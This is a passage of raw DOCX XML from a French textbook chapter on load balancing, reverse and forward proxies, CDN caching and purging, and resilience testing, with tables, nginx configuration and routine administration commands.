      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.218 — Quatre différences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35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Critère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Proxy inverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Proxy direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Représente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Les serveurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Les clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Position</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Devant l'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Devant le navigateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TLS, routage, cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3328"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Filtrage, anonymisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Nginx, Traefik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="332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Squid, Envoy sortant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux configurations courantes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Proxy sortant : forcer une sortie par une IP fixe</w:t>
        <w:br/>
        <w:t>proxy_pass http://sortie.interne:3128;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Côté client, variables d'environnement</w:t>
        <w:br/>
        <w:t>export HTTPS_PROXY=http://proxy.interne:3128</w:t>
        <w:br/>
        <w:t>export NO_PROXY=localhost,127.0.0.1,.interne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un proxy sortant avec IP fixe est souvent exigé par les partenaires : ils autorisent une adresse, pas une plage entière. C'est aussi un point de journalisation centralisé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>61.4 CDN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un réseau de distribution de contenu place des copies à proximité des utilisateurs. Le gain principal est la latence, puis la réduction de charge sur l'origine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="74" name="Picture 74"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f72.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.72 — Ce qu'un CDN apporte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux opérations essentielles · http</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En-têtes de cache appropriés pour un CDN</w:t>
        <w:br/>
        <w:t>Cache-Control: public, max-age=300, s-maxage=3600, stale-while-revalidate=60</w:t>
        <w:br/>
        <w:br/>
        <w:t># Purger une URL après publication</w:t>
        <w:br/>
        <w:t>curl -X POST https://api.cdn.exemple/purge \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d '{"urls":["https://exemple.fr/article/12"]}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.219 — Cinq contenus et leur cache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91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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Cache CDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image versionnée</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1 an, immuable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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CSS/JS versionnés</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1 an, immuable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTML public</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Oui, avec revalidation</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Minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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API publique</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Selon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>s-maxage</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Secondes à minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu personnalisé</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3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>private, no-store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LE CACHE DE BORD CACHE AUSSI VOS ERREURS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une réponse 404 ou 500 mise en cache avec un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>max-age</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> long reste servie après correction. Configurez un cache court pour les erreurs, ou purgez explicitement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>61.5 Pannes et dégradation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La répartition de charge doit être testée en panne : couper une instance, saturer une base, retirer un nœud. Une architecture non testée en panne est une hypothèse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un test reproductible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Test de résilience simple</w:t>
        <w:br/>
        <w:t># 1. Deux instances actives derrière l'équilibreur</w:t>
        <w:br/>
        <w:t># 2. Arrêt de l'instance 1</w:t>
        <w:br/>
        <w:t>systemctl stop app@1</w:t>
        <w:br/>
        <w:t># 3. Vérifier que le trafic continue</w:t>
        <w:br/>
        <w:t>for i in $(seq 50); do curl -s -o /dev/null -w "%{http_code} "</w:t>
        <w:br/>
        <w:t xml:space="preserve">  https://exemple.fr/; done</w:t>
        <w:br/>
        <w:t># 4. Redémarrer et vérifier le retour en circulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.220 — Cinq modes de panne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05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Mode de panne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Instance morte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreurs 502</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Vérification de santé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Instance lente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Latence, 499</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Délai et disjoncteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base saturée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreurs 500</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Cache, file d'attente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Zone disponible indisponible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Latence accrue</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Multi-zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pic de trafic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2912"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Saturation CPU</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Autoscaling, CDN</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DISJONCTEUR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mécanisme qui cesse d'appeler une dépendance défaillante pendant un délai, au lieu d'attendre son délai d'expiration à chaque requête. Il protège la ressource et la latence.</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CONTRÔLES D'UNE ARCHITECTURE RÉPARTIE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Chaque instance est remplaçable sans état local.</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 point de santé distingue vivacité et capacité.</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 cache est purgé à chaque publication.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Une panne d'instance est testée régulièrement.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Les journaux portent l'identifiant de requête.</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L'algorithme dépend de la durée des requêtes et de l'homogénéité des instances.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sessions en mémoire imposent une affinité ou un stockage partagé.</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vérification TCP ne prouve pas que l'application sert.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Vivacité et capacité à servir sont deux questions distinctes.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proxy inverse représente les serveurs, un proxy direct les clients.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CDN réduit la latence et absorbe les pics.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erreurs ne doivent pas être mises en cache longtemps.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architecture de répartition se teste en panne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'infrastructure réseau est complète. La partie suivante entre dans les conteneurs et l'orchestration.</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61.1 — Configurer un amont avec secours</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Deux instances actives et une de secours.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Définissez les délais.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Activez le passage à l'instance suivante.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Testez l'arrêt d'une instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 61.2 — Choisir un algorithme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois cas : API rapide, téléchargements longs, session en mémoire.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Justifiez chaque choix.</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Précisez la conséquence d'une panne.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Indiquez l'alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 61.3 — Diagnostiquer une latence en pic</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Les temps de réponse augmentent brutalement à certaines heures.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Comparez les temps applicatifs et réseau.</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Vérifiez le cache.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Cherchez une dépendance lente.</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61.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>upstream application {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    least_conn;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server 10.0.0.11:3000 max_fails=3 fail_timeout=30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server 10.0.0.12:3000 max_fails=3 fail_timeout=30s;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    server 10.0.0.13:3000 backup;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    keepalive 32;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>location / {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    proxy_pass http://application;</w:t>
        <w:br/>
